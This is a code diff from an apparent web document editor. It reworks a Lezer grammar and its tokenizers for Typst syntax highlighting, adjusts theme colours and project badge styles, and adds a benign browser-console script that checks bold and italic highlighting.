// positions, e.g. 'caption:' after a complex nested call like 'table(...)').
// We derive couldBeArgKey from character-level evidence ('(' or ',') and use
// that to decide whether to continue even when canShift(CodeIdent) is false.
export const codeIdentTokenizer = new ExternalTokenizer(
(input, stack) => {
const couldBeIdent = stack.canShift(CodeIdent)
// Walk back past whitespace — primary context discriminator.
let back = -1
while (input.peek(back) === SPACE || input.peek(back) === TAB || input.peek(back) === NEWLINE) back--
const prev = input.peek(back)
if (prev !== HASH && prev !== DOT && prev !== OPEN_PAREN && prev !== COMMA && prev !== EQUALS && prev !== COLON && prev !== PLUS) {
if (!isIdentTail(prev)) {
// prev is a structural delimiter (e.g. ')' after a function call, '{' at
// block start, '}' after a nested block). These are valid statement-start
// positions inside a CodeBlock's codeStatement* list. Trust canShift —
// it's reliable in the grammar-parsed code-block states.
if (!couldBeIdent) return
} else {
// prev looks like the tail of a preceding word — scan back to find '#' or ':'.
// Accepting ':' lets multi-word chains like 'show sel: set text' work.
let b = back
while (isIdentTail(input.peek(b))) b--
while (input.peek(b) === SPACE || input.peek(b) === TAB || input.peek(b) === NEWLINE) b--
const chainEnd = input.peek(b)
if (chainEnd !== HASH && chainEnd !== COLON) {
// Could be second+ statement in a code block (e.g. after 'let x = 1').
if (!couldBeIdent) return
}
}
}
// In arg-delimiter positions ('(' or ',') we may emit CodeArgKey regardless
// of canShift(CodeIdent) — LALR merging can suppress canShift(CodeIdent)
// after a complex first argument (e.g. figure(table(...), caption: ...)).
// ':' and '=' are value positions, NOT arg-key positions.
const couldBeArgKey = prev === OPEN_PAREN || prev === COMMA
if (!couldBeIdent && !couldBeArgKey) return
// Must start with an identifier head character.
if (!isIdentHead(input.next)) return
// Peek ahead to read the full identifier.
let len = 0
while (true) {
const ch = input.peek(len)
if (len === 0 ? isIdentHead(ch) : isIdentTail(ch)) { len++ } else { break }
}
if (len === 0) return
const chars = []
for (let i = 0; i < len; i++) chars.push(input.peek(i))
const word = String.fromCharCode(...chars)
// Let codeKeywordTokenizer handle keywords; let CodeBool handle bools.
if (KEYWORDS.has(word) || BOOLS.has(word)) return
// Emit CodeArgKey when this identifier is immediately followed by ':'.
// Only applies in arg-delimiter positions (couldBeArgKey).
let isArgKey = false
if (couldBeArgKey) {
let afterLen = len
while (input.peek(afterLen) === SPACE || input.peek(afterLen) === TAB) afterLen++
isArgKey = (input.peek(afterLen) === COLON)
}
for (let i = 0; i < len; i++) input.advance()
if (isArgKey) {
input.acceptToken(CodeArgKey)
} else if (couldBeIdent) {
input.acceptToken(CodeIdent)
}
},
{ contextual: true }
)
// ── strongBodyTokenizer ──────────────────────────────────────────────────
// Emits StrongBody — the content between the '*' delimiters of a Strong node.
//
// contextual: true — only fires when StrongBody is in the valid set, i.e.
// inside Strong → "*" . StrongBody? "*". This state is very specific and
// is not merged with item* by Lezer's aggressive LALR merging, so canShift
// is a reliable guard here.
//
// Reads everything up to the first '*' or newline (Typst bold does not span
// lines). A trailing '*' that is the closing delimiter is left for the
// grammar rule to consume.
export const strongBodyTokenizer = new ExternalTokenizer(
(input, _stack) => {
let hasContent = false
while (input.next !== -1 && input.next !== STAR && input.next !== NEWLINE) {
input.advance()
hasContent = true
}
if (hasContent) input.acceptToken(StrongBody)
},
{ contextual: true }
)
// ── emphBodyTokenizer ────────────────────────────────────────────────────
// Emits EmphBody — the content between the '_' delimiters of an Emphasis node.
// Same design as strongBodyTokenizer; stops at '_' or newline.
export const emphBodyTokenizer = new ExternalTokenizer(
(input, _stack) => {
let hasContent = false
while (input.next !== -1 && input.next !== UNDERSCORE && input.next !== NEWLINE) {
input.advance()
hasContent = true
}
if (hasContent) input.acceptToken(EmphBody)
},
{ contextual: true }
)
@@ -5,10 +5,8 @@
// headingTitleTokenizer — HeadingTitle: the title text to end of line
// rawTokenizer — triple-backtick raw block open/body/close
// rawInlineTokenizer — single-backtick raw inline content
// codeBlockTokenizer — brace-depth tracking inside #{ ... }
// blockCommentTokenizer — depth-tracked nested /* ... */ comments
// codeIdentTokenizer — CodeIdent: identifier, only fires in code context
// strongBodyTokenizer — StrongBody: content inside *...*
// emphBodyTokenizer — EmphBody: content inside _..._
@top Document { item* }
@@ -26,9 +24,8 @@ item {
Label |
Ref |
Escape |
URL |
MarkupContent |
ClosingSquare
Newline |
MarkupContent
}
// ── Headings ──────────────────────────────────────────────────────────────
@@ -61,140 +58,63 @@ RawInline { "`" RawInlineContent? "`" }
// #[ ... ] — content block (re-parses as markup items)
CodeExpr { "#" codeExprBody }
// codeExprBody: forms valid after '#' in markup, or after ':' / '=' in a
// keyword-body. FuncExpr handles ident+callSuffix(s); bare CodeIdent handles
// a plain variable reference (#x). No CallExpr with callSuffix* here — that
// *-quantifier makes both shift and reduce carry !call precedence (a tie that
// @right cannot resolve reliably once codeStatement* state-merging is in play).
codeExprBody {
KeywordExpr |
AtomExpr |
FuncExpr |
CodeIdent |
CallExpr |
CodeBlock |
ContentBlock
}
// callOrValue covers the subject of a keyword expression (#set text, #show link,
// #import "pkg", #let name). keywordBody is exclusive: ':' for show-rule bodies
// and '=' for let-binding values (a keyword expression never has both).
// Two precedences:
// call @right — prefer extending callSuffixes (FuncExpr) over completing the
// FuncExpr and letting '(' start a new statement. The `!call` marker
// encodes the shift as (call << 2) and the FuncExpr reduce as
// (call << 2) - 1 (due to @right); shift > reduce, so callSuffix
// chains are greedily extended. Without @right both actions have
// the same numeric precedence and the conflict is unresolved.
// kw — prefer CodeKeyword !kw callOrValueAndBody over CodeKeyword keywordBody?
// when an identifier follows the keyword. shift = kw << 2, reduce
// (second alternative) = 0; kw > 0, no @right needed.
// add — resolves the shift/reduce conflict when a '+' follows a codeArgValue:
// SHIFT '+' (extend codeArgValue → codeArgValue !add "+" codeValue): prec add
// REDUCE codeArgItem → codeArgValue (complete arg): prec 0
// add > 0 → shift wins, so 0.8pt + brand stays as one arg value.
@precedence { call @right, kw, add }
// KeywordExpr: used in markup-level code (#show, #let, #set …) AND nested
// inside codeExprBody (e.g. the RHS after ':' in a show-rule).
// Same two-alternative structure as codeStatement: the !kw on the first
// alternative gives the shift prec kw > 0 over the unannotated reduce of the
// second alternative (prec 0). This avoids the call-vs-call tie that arises
// from the old `callOrValue?` optional pattern.
KeywordExpr {
CodeKeyword !kw callOrValueAndBody |
CodeKeyword keywordBody?
}
// callOrValue: FuncExpr for "ident(args)" / "ident.method", bare CodeIdent for
// a plain name, CodeString for string subjects like #import "pkg".
// FuncExpr requires at least one callSuffix, so at [CodeIdent ·] seeing '(':
// SHIFT (start callSuffixes, prec call) vs REDUCE bare CodeIdent (prec 0).
// call > 0 → shift wins cleanly.
callOrValue { FuncExpr | CodeIdent | CodeString }
keywordBody { ":" codeExprBody | "=" codeValue }
// CallExpr? covers '#set text(size: 12pt)', '#show heading: ...', etc.
// The optional CallExpr is only shifted when the next token is CodeIdent,
// so there is no shift/reduce conflict with other items that follow keywords.
KeywordExpr { CodeKeyword CallExpr? }
AtomExpr { CodeBool }
// codeStatement is the unit inside a CodeBlock's brace body.
// Two explicit alternatives for the keyword case avoid the LALR ambiguity
// that arises from codeStatement* merging when callOrValue? is optional.
// The !kw annotation on the first alternative (shift callOrValueAndBody) has
// higher precedence than the bare reduce of the second alternative (prec 0),
// so 'show strong: …' grabs 'strong' as callOrValue rather than completing
// KeywordExpr early with empty callOrValue.
codeStatement {
CodeKeyword !kw callOrValueAndBody |
CodeKeyword keywordBody? |
codeValue |
";"
}
callOrValueAndBody { callOrValue keywordBody? }
// FuncExpr: identifier followed by one-or-more call suffixes.
// callSuffixes uses explicit left-recursion (not +) so the !call annotation
// on the recursive extension point gives the shift prec call vs the unannotated
// reduce of codeValue → FuncExpr (prec 0) — shift wins, no @right tie.
callSuffixes { callSuffix | callSuffixes !call callSuffix }
FuncExpr { CodeIdent !call callSuffixes }
CallExpr { CodeIdent callSuffix* }
callSuffix {
CodeArgs |
"." CodeIdent |
ContentBlock
"." CodeIdent
}
CodeArgs { "(" codeArgList? ")" }
codeArgList { codeArgItem ("," codeArgItem)* ","? }
codeArgItem {
CodeArgKey ":" codeArgValue |
codeArgValue
CodeIdent ":" codeValue |
codeValue
}
// codeArgValue extends codeValue with '+' chaining for expressions like
// `stroke: 0.8pt + brand` or `fill: base + overlay`.
// Left-recursive rule: LALR state for codeArgValue · seeing '+':
// SHIFT '+' (extend, !add prec): prec add > 0
// REDUCE codeArgItem → codeArgValue (complete): prec 0
// add > 0 → shift wins cleanly. No @right needed (strict dominance).
// Only used inside CodeArgs, so codeStatement* LALR-merging does not apply.
codeArgValue { codeValue | codeArgValue !add "+" codeValue }
codeValue {
CodeString |
CodeNumber |
CodeBool |
FuncExpr |
CodeIdent |
CallExpr |
ContentBlock |
CodeBlock |
InlineMath |
CodeArray
InlineMath
}
// Typst array / tuple / dictionary literal: (a, b) or (key: val, …)
// Reuses codeArgList so named-key entries like (auto, 1fr) work too.
CodeArray { "(" codeArgList? ")" }
// CodeBlock parses its content as a codeStatement* list so that keywords
// (show, let, set…) and identifiers inside braces receive proper highlighting.
CodeBlock { "{" codeStatement* "}" }
// CodeBlockBody depth-tracks braces so #{ let x = { 1 } } parses correctly.
CodeBlock { "{" CodeBlockBody? "}" }
// ContentBlock re-enters markup mode, allowing #[*bold* text].
ContentBlock { "[" item* "]" }
// ── Math ──────────────────────────────────────────────────────────────────
// Both inline ($x^2$) and display ($ x^2 $) math use the same node type.
// MathContent* (not ?) allows multi-line display math: each line becomes one
// MathContent token (stopping at '\n'), and @skip consumes the newlines between.
InlineMath { "$" MathContent* "$" }
InlineMath { "$" MathContent? "$" }
// ── Markup formatting ─────────────────────────────────────────────────────
// Strong and Emphasis use flat external body tokens (StrongBody / EmphBody)
// rather than recursive strongItem* / emphItem* loops. The loop approach
// triggered LALR state merging that caused item*-level tokens (MarkupContent,
// CodeIdent) to win over StrongText/EmphText inside the construct, so the
// body nodes were never produced. The flat external tokens are contextual
// (canShift only fires inside Strong/Emphasis) and reliably avoid those
// merged states.
Strong { "*" StrongBody? "*" }
Emphasis { "_" EmphBody? "_" }
// Cross-nesting of Strong/Emphasis is intentionally excluded to avoid a
// mutual-recursion cycle (Strong→Emphasis→Strong) that causes state explosion
// in the Lezer LR automaton builder. StrongText includes '_' and EmphText
// includes '*', so the nested delimiters are treated as plain text inside the
// opposite construct rather than producing error nodes.
Strong { "*" strongItem* "*" }
strongItem { CodeExpr | InlineMath | RawInline | Label | Ref | StrongText }
Emphasis { "_" emphItem* "_" }
emphItem { CodeExpr | InlineMath | RawInline | Label | Ref | EmphText }
// ── Labels and references ─────────────────────────────────────────────────
Label { "<" LabelName ">" }
@@ -222,6 +142,10 @@ Escape { "\\" EscapeChar }
RawInlineContent
}
@external tokens codeBlockTokenizer from "./tokens.mjs" {
CodeBlockBody
}
@external tokens blockCommentTokenizer from "./tokens.mjs" {
BlockCommentBody
}
@@ -234,44 +158,30 @@ Escape { "\\" EscapeChar }
MathContent
}
@external tokens codeKeywordTokenizer from "./tokens.mjs" {
CodeKeyword
}
// CodeIdent is external so codeIdentTokenizer can apply a character-level
// guard: it only emits when the preceding non-whitespace character is one of
// '#', '.', '(', ',' — i.e. genuinely inside a code expression. This stops
// the token from firing in markup body text, where LALR state merging would
// otherwise cause the entire token (including any leading '_') to be consumed
// as a code identifier instead of letting '_' open an Emphasis.
// CodeArgKey is emitted by the same tokenizer when an identifier is immediately
// followed by ':' — the tokenizer pre-disambiguates named arg keys so the LALR
// parser does not need to choose between codeArgItem alternatives on lookahead.
@external tokens codeIdentTokenizer from "./tokens.mjs" {
CodeIdent,
CodeArgKey
}
@external tokens strongBodyTokenizer from "./tokens.mjs" {
StrongBody
}
@external tokens emphBodyTokenizer from "./tokens.mjs" {
EmphBody
}
// ── Regular tokens ────────────────────────────────────────────────────────
@tokens {
// All whitespace including newlines. Heading detection still works because
// headingTokenizer uses input.peek(-1) on the raw character stream — it sees
// the '\n' byte regardless of what @skip consumes at the token level.
// Including '\n' here lets multi-line code expressions (e.g. #figure(\n ...\n))
// parse without error instead of triggering Lezer error recovery.
spaces { $[ \t\n\r]+ }
// Horizontal whitespace only. Newlines are kept as explicit Newline items
// so that HeadingMark (which checks start-of-line via input.peek(-1)) can
// reliably detect newlines in the raw input stream.
spaces { $[ \t]+ }
// Keywords take precedence over identifiers when they match fully
// (e.g. "let" → CodeKeyword, "letter" → CodeIdent).
CodeKeyword {
"let" | "set" | "show" | "import" | "include" |
"if" | "else" | "for" | "while" | "return" |
"break" | "continue" | "in" | "as" |
"and" | "or" | "not" | "context"
}
// Boolean / null literals — distinct from keywords for highlighting.
CodeBool { "true" | "false" | "none" | "auto" }
// General identifier: [A-Za-z_][A-Za-z0-9_-]*
CodeIdent { identHead identTail* }
identHead { @asciiLetter | "_" }
identTail { @asciiLetter | @digit | "_" | "-" }
// Double-quoted string with backslash escapes (no single-quoted strings in Typst).
CodeString { '"' (!["\\\n] | "\\" _)* '"' }
@@ -281,42 +191,41 @@ Escape { "\\" EscapeChar }
("pt" | "mm" | "cm" | "in" | "em" | "rem" | "fr" | "deg" | "rad" | "%")?
}
// URL: bare https:// or http:// links in markup text. Matched as a single
// token so '://' is never split into ':' + LineComment '//…'. Stops at
// whitespace and angle brackets (labels use '<…>').
URL { ("https" | "http") "://" (![ \t\n<>])* }
// Text tokens for markup contexts; each excludes its own delimiters.
// HeadingText, LineCommentContent, and MathContent are external tokens
// (see above) — broad "read-to-delimiter" tokens that would otherwise
// conflict with every other literal token in LALR-merged states.
// '<' is excluded from StrongText/EmphText so that Label ('<' LabelName '>')
// is recognised inside strong/emphasis rather than consumed as plain text.
StrongText { ![\n*$#`<@\\]+ }
EmphText { ![\n_$#`<@\\]+ }
// Regular markup: excludes all special-character starters plus whitespace
// (whitespace is handled by @skip). The '/' is excluded so that '//' and
// '/*' are not accidentally consumed as plain text. ']' is excluded so
// that ContentBlock { "[" item* "]" } can always close reliably — a bare
// ']' in body text is matched as ClosingSquare instead.
MarkupContent { ![\n \t\]=*_$#/<@`\\]+ }
// Fallback for a bare ']' in markup text (outside any ContentBlock).
// Inside ContentBlock the literal "]" terminal wins via @precedence.
ClosingSquare { "]" }
// '/*' are not accidentally consumed as plain text.
MarkupContent { ![\n \t=*_$#/<@`\\]+ }
// Label names: identifiers with optional dots/colons (e.g. <sec:intro>).
LabelName { (@asciiLetter | "_" | @digit) (@asciiLetter | @digit | "_" | "-" | "." | ":")* }
RefName { (@asciiLetter | "_") (@asciiLetter | @digit | "_" | "-")* }
LabelName { (identHead | @digit) (identTail | "." | ":")* }
RefName { identHead identTail* }
// Escape: any single character after backslash.
EscapeChar { _ }
// Resolve ambiguities in merged states:
// EscapeChar > spaces: after '\', EscapeChar must win over the skip token.
// "(" > "." > "]": callSuffix delimiters must win over MarkupContent after
// a code identifier (merged states expose these to the markup tokenizer).
// "_" > MarkupContent: '_' must open Emphasis rather than being swallowed
// by MarkupContent (redundant since '_' is in MarkupContent's exclusion
// set, but kept for clarity).
// CodeIdent and StrongText/EmphText are now external tokens — not listed.
// "[" > MarkupContent: ContentBlock callSuffix wins in merged code/markup states.
// CodeString > MarkupContent: '"' starts a string literal after a keyword.
// ":" > MarkupContent: keywordBody ':' wins over markup colon in code states.
// URL > MarkupContent: 'https://' / 'http://' wins over plain markup text.
@precedence { CodeBool EscapeChar CodeString URL "[" ":" "(" "." "+" "]" ClosingSquare "_" spaces MarkupContent }
// Newline item — kept out of @skip so heading detection works.
Newline { "\n" }
// Resolve ambiguities: more-specific tokens win over broader catch-alls.
// EscapeChar > spaces: after '\', EscapeChar must win over the skip token
// (both match \t; without this, '\t' would be mis-tokenized).
// "(" > "." > "]" > text tokens: after '#' CodeIdent, callSuffix delimiters
// must win over MarkupContent/StrongText/EmphText in merged states.
// LineCommentContent and MathContent are external tokens — not listed here.
// "_" added after CodeIdent: KeywordExpr { CodeKeyword CallExpr? } merges
// the post-keyword state with markup states where "_" starts Emphasis.
// CodeIdent wins so '#set _name(...)' is tokenised correctly; in pure markup
// states CodeIdent is not in the valid set so "_" still opens Emphasis.
@precedence { CodeKeyword CodeBool CodeIdent EscapeChar "(" "." "]" "_" spaces MarkupContent StrongText EmphText }
}
@skip { spaces }
File diff suppressed because one or more lines are too long
@@ -1,45 +0,0 @@
// This file was generated by lezer-generator. You probably shouldn't edit it.
export const
HeadingMark = 1,
HeadingTitle = 2,
RawBlockOpen = 3,
RawBlockBody = 4,
RawBlockClose = 5,
RawInlineContent = 6,
BlockCommentBody = 7,
LineCommentContent = 8,
MathContent = 9,
CodeKeyword = 10,
CodeIdent = 11,
CodeArgKey = 12,
StrongBody = 13,
EmphBody = 14,
Document = 15,
Heading = 16,
LineComment = 17,
BlockComment = 18,
RawBlock = 19,
RawInline = 20,
CodeExpr = 21,
KeywordExpr = 22,
FuncExpr = 23,
CodeArgs = 24,
CodeString = 25,
CodeNumber = 26,
CodeBool = 27,
ContentBlock = 28,
CodeBlock = 29,
InlineMath = 30,
CodeArray = 31,
AtomExpr = 32,
Strong = 33,
Emphasis = 34,
Label = 35,
LabelName = 36,
Ref = 37,
RefName = 38,
Escape = 39,
EscapeChar = 40,
URL = 41,
MarkupContent = 42,
ClosingSquare = 43
@@ -73,10 +73,7 @@
},
".tok-variableName": {
"color": "#9b859d"
},
".tok-attributeName": {
"color": "#F4BF75"
}
},
"dark": true
}
}
@@ -74,10 +74,7 @@
},
".tok-variableName": {
"color": "#FF80E1"
},
".tok-attributeName": {
"color": "#FFD700"
}
},
"dark": true
}
}
@@ -56,10 +56,7 @@
},
".tok-attributeValue": {
"color": "rgb(0, 64, 128)"
},
".tok-attributeName": {
"color": "#994409"
}
},
"dark": false
}
}
@@ -67,10 +67,7 @@
},
".tok-attributeValue": {
"color": "#234A97"
},
".tok-attributeName": {
"color": "#7B3814"
}
},
"dark": false
}
}
@@ -69,10 +69,7 @@
},
".tok-list": {
"color": "rgb(185, 6, 144)"
},
".tok-attributeName": {
"color": "#994409"
}
},
"dark": false
}
}
@@ -53,10 +53,7 @@
".tok-regexp": {
"color": "#009926",
"fontWeight": "normal"
},
".tok-attributeName": {
"color": "#735C0F"
}
},
"dark": false
}
}
@@ -71,10 +71,7 @@
".tok-comment": {
"fontStyle": "italic",
"color": "#00E060"
},
".tok-attributeName": {
"color": "#F4BF75"
}
},
"dark": true
}
}
@@ -55,10 +55,7 @@
},
".tok-operator": {
"color": "#EBDAB4"
},
".tok-attributeName": {
"color": "#FABD2F"
}
},
"dark": true
}
}
@@ -61,10 +61,7 @@
".tok-comment": {
"fontStyle": "italic",
"color": "#BC9458"
},
".tok-attributeName": {
"color": "#DA4939"
}
},
"dark": true
}
}
@@ -70,10 +70,7 @@
},
".tok-variableName": {
"color": "#FF80E1"
},
".tok-attributeName": {
"color": "#d4c96e"
}
},
"dark": true
}
}
@@ -64,10 +64,7 @@
},
".tok-list": {
"color": "#8F5B26"
},
".tok-attributeName": {
"color": "#994409"
}
},
"dark": false
}
}
@@ -57,10 +57,7 @@
},
".tok-number": {
"color": "#5A5CAD"
},
".tok-attributeName": {
"color": "#7B3F00"
}
},
"dark": false
}
}
@@ -66,10 +66,7 @@
},
".tok-variableName": {
"color": "#C1C144"
},
".tok-attributeName": {
"color": "#ACA0DC"
}
},
"dark": true
}
}
@@ -72,10 +72,7 @@
},
".tok-list": {
"color": "rgb(185, 6, 144)"
},
".tok-attributeName": {
"color": "#994409"
}
},
"dark": false
}
}
@@ -69,10 +69,7 @@
},
".tok-attributeValue": {
"color": "#7587A6"
},
".tok-attributeName": {
"color": "#CF6A4C"
}
},
"dark": true
}
}
@@ -407,19 +407,15 @@ ul.project-list-filters {
white-space: nowrap;
&.project-format-badge-quarto {
background-color: #447099; // Quarto blue (PDF output)
}
&.project-format-badge-quarto-slides {
background-color: #e4637c; // RevealJS pink-red
background-color: #447099;
}
&.project-format-badge-typst {
background-color: #239dad; // typst.app brand blue
background-color: #ee6331;
}
&.project-format-badge-latex {
background-color: #098842; // Overleaf brand green
background-color: #72994e;
}
}
-1
View File
@@ -53,7 +53,6 @@ export type ProjectApi = {
accessLevel: ProjectAccessLevel
source: Source
compiler?: ProjectCompiler
quartoFlavor?: 'revealjs' | 'pdf'
}
export type Project = MergeAndOverride<
+52
View File
@@ -0,0 +1,52 @@
// Typst bold/italic parse-tree diagnostic
// Open a Typst document that contains *bold* and _italic_ text,
// then paste this whole block into the browser console.
(function () {
const strong = [...document.querySelectorAll('.tok-strong')]
const emphasis = [...document.querySelectorAll('.tok-emphasis')]
console.group('=== Typst bold/italic diagnostic ===')
console.log('tok-strong count :', strong.length)
console.log('tok-emphasis count:', emphasis.length)
if (strong.length) {
console.log('tok-strong text :', strong.map(s => JSON.stringify(s.textContent)))
}
if (emphasis.length) {
console.log('tok-emphasis text :', emphasis.map(s => JSON.stringify(s.textContent)))
}
// Interpret results
if (strong.length === 0 && emphasis.length === 0) {
console.warn(
'RESULT: Grammar is NOT producing Strong/Emphasis nodes.',
'This is a LALR state-merge bug — needs a grammar fix.'
)
} else {
const strongText = strong.map(s => s.textContent).join('')
const emphText = emphasis.map(s => s.textContent).join('')
const hasMidStrong = strong.length > 2 // more than just the two * delimiters
const hasMidEmph = emphasis.length > 2
if (hasMidStrong || hasMidEmph) {
console.info(
'RESULT: Grammar IS producing Strong/Emphasis nodes (content inside delimiters is styled).',
'Bold/italic not visible? Issue is the loaded font — Source Code Pro only has Regular (400).',
'Fix: switch editor font to DM Mono (which has actual Italic + Medium faces).',
'Or: load Source Code Pro Bold/Italic font files.'
)
} else {
console.warn(
'RESULT: Partial — only the delimiters (* or _) are styled, not the text between them.',
'StrongText/EmphText nodes are missing. Needs a grammar fix.'
)
}
console.log('all strong text joined :', JSON.stringify(strongText))
console.log('all emphasis text joined:', JSON.stringify(emphText))
}
console.groupEnd()
})()